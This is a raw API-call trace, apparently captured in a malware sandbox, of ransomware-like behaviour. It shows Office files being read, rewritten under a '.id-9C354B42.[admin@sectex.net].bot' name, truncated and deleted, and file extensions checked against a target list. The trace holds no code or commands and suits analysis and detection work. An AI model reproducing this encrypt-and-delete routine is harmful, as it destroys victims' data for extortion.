	[0160.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.197] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.197] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.198] GetLastError () returned 0x0
	[0160.198] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0160.199] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0160.200] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.200] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0160.200] SetEndOfFile (hFile=0x398) returned 1
	[0160.201] CloseHandle (hObject=0x398) returned 1
	[0160.201] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.201] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.203] CloseHandle (hObject=0x3f0) returned 1
	[0160.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico")) returned 1
	[0160.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.204] lstrlenW (lpString=".doc") returned 4
	[0160.204] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.204] lstrlenW (lpString=".docx") returned 5
	[0160.204] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.204] lstrlenW (lpString=".pdf") returned 4
	[0160.204] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.204] lstrlenW (lpString=".xls") returned 4
	[0160.204] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.204] lstrlenW (lpString=".xlsx") returned 5
	[0160.204] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.204] lstrlenW (lpString=".ppt") returned 4
	[0160.204] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.204] lstrlenW (lpString=".zip") returned 4
	[0160.204] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.204] lstrlenW (lpString=".rar") returned 4
	[0160.204] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.204] lstrlenW (lpString=".bz2") returned 4
	[0160.204] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.204] lstrlenW (lpString=".7z") returned 3
	[0160.204] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.204] lstrlenW (lpString=".dbf") returned 4
	[0160.204] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.204] lstrlenW (lpString=".1cd") returned 4
	[0160.205] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.205] lstrlenW (lpString=".jpg") returned 4
	[0160.205] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.205] lstrlenW (lpString=".doc") returned 4
	[0160.205] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.205] lstrlenW (lpString=".docx") returned 5
	[0160.205] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.205] lstrlenW (lpString=".pdf") returned 4
	[0160.205] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.205] lstrlenW (lpString=".xls") returned 4
	[0160.205] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.205] lstrlenW (lpString=".xlsx") returned 5
	[0160.205] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.205] lstrlenW (lpString=".ppt") returned 4
	[0160.205] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.205] lstrlenW (lpString=".zip") returned 4
	[0160.205] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.205] lstrlenW (lpString=".rar") returned 4
	[0160.205] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.205] lstrlenW (lpString=".bz2") returned 4
	[0160.205] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.205] lstrlenW (lpString=".7z") returned 3
	[0160.205] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.205] lstrlenW (lpString=".dbf") returned 4
	[0160.205] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.206] lstrlenW (lpString=".1cd") returned 4
	[0160.206] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO") returned 63
	[0160.206] lstrlenW (lpString=".jpg") returned 4
	[0160.206] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.206] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.206] lstrlenW (lpString="APPTS.ICO") returned 9
	[0160.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.206] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0160.207] CloseHandle (hObject=0x3f0) returned 1
	[0160.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico")) returned 0x20
	[0160.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.207] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.207] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.208] GetLastError () returned 0x0
	[0160.208] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.210] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.211] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.211] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0160.211] SetEndOfFile (hFile=0x398) returned 1
	[0160.211] CloseHandle (hObject=0x398) returned 1
	[0160.211] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.211] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.213] CloseHandle (hObject=0x3f0) returned 1
	[0160.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.213] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico")) returned 1
	[0160.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.214] lstrlenW (lpString=".doc") returned 4
	[0160.214] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.214] lstrlenW (lpString=".docx") returned 5
	[0160.214] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.214] lstrlenW (lpString=".pdf") returned 4
	[0160.214] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.214] lstrlenW (lpString=".xls") returned 4
	[0160.214] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.214] lstrlenW (lpString=".xlsx") returned 5
	[0160.214] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.214] lstrlenW (lpString=".ppt") returned 4
	[0160.214] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.214] lstrlenW (lpString=".zip") returned 4
	[0160.214] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.215] lstrlenW (lpString=".rar") returned 4
	[0160.215] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.215] lstrlenW (lpString=".bz2") returned 4
	[0160.215] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.215] lstrlenW (lpString=".7z") returned 3
	[0160.215] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.215] lstrlenW (lpString=".dbf") returned 4
	[0160.215] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.215] lstrlenW (lpString=".1cd") returned 4
	[0160.215] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.215] lstrlenW (lpString=".jpg") returned 4
	[0160.215] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.215] lstrlenW (lpString=".doc") returned 4
	[0160.215] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.215] lstrlenW (lpString=".docx") returned 5
	[0160.215] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.215] lstrlenW (lpString=".pdf") returned 4
	[0160.215] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.215] lstrlenW (lpString=".xls") returned 4
	[0160.215] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.215] lstrlenW (lpString=".xlsx") returned 5
	[0160.215] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.215] lstrlenW (lpString=".ppt") returned 4
	[0160.215] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.216] lstrlenW (lpString=".zip") returned 4
	[0160.216] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.216] lstrlenW (lpString=".rar") returned 4
	[0160.216] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.216] lstrlenW (lpString=".bz2") returned 4
	[0160.216] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.216] lstrlenW (lpString=".7z") returned 3
	[0160.216] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.216] lstrlenW (lpString=".dbf") returned 4
	[0160.216] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.216] lstrlenW (lpString=".1cd") returned 4
	[0160.216] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO") returned 63
	[0160.216] lstrlenW (lpString=".jpg") returned 4
	[0160.216] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.216] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.216] lstrlenW (lpString="CNFNOT.CFG") returned 10
	[0160.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.217] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=320) returned 1
	[0160.217] CloseHandle (hObject=0x3f0) returned 1
	[0160.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg")) returned 0x20
	[0160.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.217] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.217] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.218] GetLastError () returned 0x0
	[0160.218] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x140, lpOverlapped=0x0) returned 1
	[0160.219] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x150, lpOverlapped=0x0) returned 1
	[0160.220] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.220] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0160.220] SetEndOfFile (hFile=0x398) returned 1
	[0160.220] CloseHandle (hObject=0x398) returned 1
	[0160.220] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.221] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.223] CloseHandle (hObject=0x3f0) returned 1
	[0160.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg")) returned 1
	[0160.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.224] lstrlenW (lpString=".doc") returned 4
	[0160.224] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString=".docx") returned 5
	[0160.224] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.224] lstrlenW (lpString=".pdf") returned 4
	[0160.224] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString=".xls") returned 4
	[0160.224] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString=".xlsx") returned 5
	[0160.224] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.224] lstrlenW (lpString=".ppt") returned 4
	[0160.224] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.224] lstrlenW (lpString=".zip") returned 4
	[0160.224] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString=".rar") returned 4
	[0160.224] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString=".bz2") returned 4
	[0160.224] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.224] lstrlenW (lpString=".7z") returned 3
	[0160.224] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.224] lstrlenW (lpString=".dbf") returned 4
	[0160.224] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.225] lstrlenW (lpString=".1cd") returned 4
	[0160.225] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.225] lstrlenW (lpString=".jpg") returned 4
	[0160.225] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.225] lstrlenW (lpString=".doc") returned 4
	[0160.225] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString=".docx") returned 5
	[0160.225] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.225] lstrlenW (lpString=".pdf") returned 4
	[0160.225] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString=".xls") returned 4
	[0160.225] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString=".xlsx") returned 5
	[0160.225] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.225] lstrlenW (lpString=".ppt") returned 4
	[0160.225] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.225] lstrlenW (lpString=".zip") returned 4
	[0160.225] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString=".rar") returned 4
	[0160.225] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.225] lstrlenW (lpString=".bz2") returned 4
	[0160.225] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.225] lstrlenW (lpString=".7z") returned 3
	[0160.225] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.226] lstrlenW (lpString=".dbf") returned 4
	[0160.226] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.226] lstrlenW (lpString=".1cd") returned 4
	[0160.226] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG") returned 64
	[0160.226] lstrlenW (lpString=".jpg") returned 4
	[0160.226] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.226] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.226] lstrlenW (lpString="CNFNOT.ICO") returned 10
	[0160.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.226] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0160.227] CloseHandle (hObject=0x3f0) returned 1
	[0160.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico")) returned 0x20
	[0160.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
